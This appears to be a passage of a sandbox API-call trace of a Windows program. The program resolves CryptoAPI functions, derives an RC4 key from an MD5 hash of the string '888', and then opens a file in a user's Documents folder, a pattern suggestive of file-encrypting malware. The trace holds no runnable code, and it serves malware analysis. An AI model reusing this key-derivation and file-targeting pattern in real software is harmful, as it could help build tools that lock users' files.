dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6f20, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0221.724] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7c330) returned 1 [0221.724] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0221.724] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0221.724] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0221.724] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0221.724] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0221.725] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0221.725] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0221.725] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0221.725] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0221.725] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0221.725] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0221.725] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0221.725] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0221.725] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0221.725] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0221.725] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0221.725] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0221.725] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0221.725] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.725] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.725] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.725] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0221.725] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.725] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0221.725] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.725] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.725] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.725] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.725] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.725] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.726] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.726] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0221.726] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0221.726] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0221.726] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0221.726] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0221.726] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0221.726] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0221.726] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0221.726] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0221.726] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0221.726] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0221.726] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0221.726] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0221.726] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0221.726] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0221.726] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0221.726] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0221.726] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0221.726] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0221.726] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.726] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.726] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0221.726] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0221.727] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0221.727] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0221.727] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0221.727] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0221.727] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0221.727] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0221.727] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0221.727] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0221.727] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0221.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0221.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aabc38, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0221.727] CryptCreateHash (in: hProv=0xa7c330, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0221.727] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.727] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.727] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.727] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0221.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a72748, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0221.727] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0221.727] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0221.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a72748, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0221.728] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.728] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0221.728] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0221.728] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0221.728] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0221.728] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0221.728] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0221.728] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0221.728] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aaba40, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0221.728] CryptHashData (hHash=0x9e1db8, pbData=0x2a72738, dwDataLen=0x3, dwFlags=0x1) returned 1 [0221.728] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.728] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.728] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.728] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0221.728] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0221.728] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0221.728] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0221.728] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0221.728] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0221.728] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0221.728] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0221.728] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0221.728] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0221.728] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0221.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0221.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aabbf0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0221.729] CryptDeriveKey (in: hProv=0xa7c330, Algid=0x6601, hBaseData=0x9e1db8, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e2238) returned 1 [0221.729] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.729] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.729] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.729] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.729] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.729] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.729] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0221.729] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0221.729] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0221.729] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0221.729] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0221.729] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0221.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0221.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f7120, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0221.729] CryptDestroyHash (hHash=0x9e1db8) returned 1 [0221.729] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.729] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.729] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.729] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.730] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.730] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/wdchYxA7KRrFzTiR.odp" (normalized: "c:\\users\\fd1hvy\\documents\\wdchyxa7krrfztir.odp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50c [0221.730] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0221.730] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0221.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f71a0 [0221.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0221.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0221.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0221.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0221.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0221.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0221.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0221.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0221.731] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0221.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0221.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0221.731] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0221.731] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0221.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0221.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0221.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0221.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0221.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0221.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0221.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0221.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0221.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0221.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0221.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0221.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0221.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0221.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0221.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0221.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0221.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0221.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0221.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854650 [0221.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0221.732] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents/" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0221.732] 